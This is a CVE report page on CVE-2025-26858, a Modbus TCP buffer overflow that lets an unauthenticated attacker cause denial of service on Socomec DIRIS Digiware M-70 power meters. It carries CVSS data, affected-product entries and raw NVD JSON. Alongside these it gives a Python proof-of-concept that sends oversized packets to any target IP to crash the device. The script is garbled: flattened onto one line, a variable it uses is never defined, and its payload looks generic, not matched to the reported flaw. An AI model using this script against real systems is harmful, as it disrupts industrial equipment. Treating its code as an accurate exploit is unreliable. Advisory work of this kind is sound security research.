Security Vulnerability Report
中文
CVE-2025-26858 CVSS 8.6 HIGH

CVE-2025-26858

Published: 2025-12-01 16:15:52
Last Modified: 2025-12-05 20:49:15
Source: [email protected]

Description

A buffer overflow vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted set of network packets can lead to denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 < 1.6.9 (受影响版本)
Socomec DIRIS Digiware M-70 1.6.9 (确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-26858 PoC - Socomec DIRIS Digiware M-70 Modbus TCP Buffer Overflow Reference: TALOS-2025-2152 Note: This PoC is for educational and authorized security testing purposes only. """ import socket import struct import sys def create_modbus_tcp_packet(unit_id, function_code, data): """ Create a Modbus TCP packet with potential buffer overflow payload. Modbus TCP Header: [Transaction ID (2)] [Protocol ID (2)] [Length (2)] [Unit ID (1)] + PDU """ transaction_id = 0x0001 protocol_id = 0x0000 # Modbus PDU (Protocol Data Unit) pdu = bytes([function_code]) + data # Calculate length: Unit ID (1) + PDU length = 1 + len(pdu) header = struct.pack('>HHH', transaction_id, protocol_id, length) unit_id = bytes([unit_id]) return header + unit_id + pdu def exploit_buffer_overflow(target_ip, target_port=502): """ Send malicious Modbus TCP packet to trigger buffer overflow. """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Malicious payload designed to overflow buffer # Extended data length to cause overflow in Modbus TCP handler overflow_data = b'\x00' * 512 + b'\x41' * 64 # Try different function codes commonly used in exploitation for func_code in [0x03, 0x04, 0x10]: packet = create_modbus_tcp_packet( unit_id=0xFF, function_code=func_code, data=overflow_data ) sock.send(packet) print(f"[+] Sent malicious packet with function code 0x{func_code:02X}") sock.close() print("[*] Packet sent. Target may be experiencing DoS condition.") except socket.timeout: print("[-] Connection timeout - target may be down") except socket.error as e: print(f"[-] Socket error: {e}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port=502]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 502 print(f"[*] Targeting {target}:{port}") print("[*] CVE-2025-26858 PoC - Modbus TCP Buffer Overflow") exploit_buffer_overflow(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-26858", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:52.387", "lastModified": "2025-12-05T20:49:15.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted set of network packets can lead to denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2152", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-10/CVE-2025-26858---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-38-44_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2152", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.